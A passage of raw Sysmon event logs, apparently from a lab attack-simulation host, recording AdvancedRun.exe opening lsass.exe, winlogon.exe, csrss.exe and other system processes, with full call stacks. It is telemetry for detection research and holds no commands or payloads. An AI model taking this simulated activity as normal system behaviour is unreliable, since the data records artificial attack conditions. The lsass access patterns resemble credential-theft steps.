Run.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004079713Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079712Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004079711Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079710Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079709Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079708Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079707Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079706Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079705Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079704Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.815{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004079703Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.815{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004079702Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.815{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079695Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.530{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079694Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.530{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079693Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.530{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079690Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.523{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079689Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.522{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079688Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 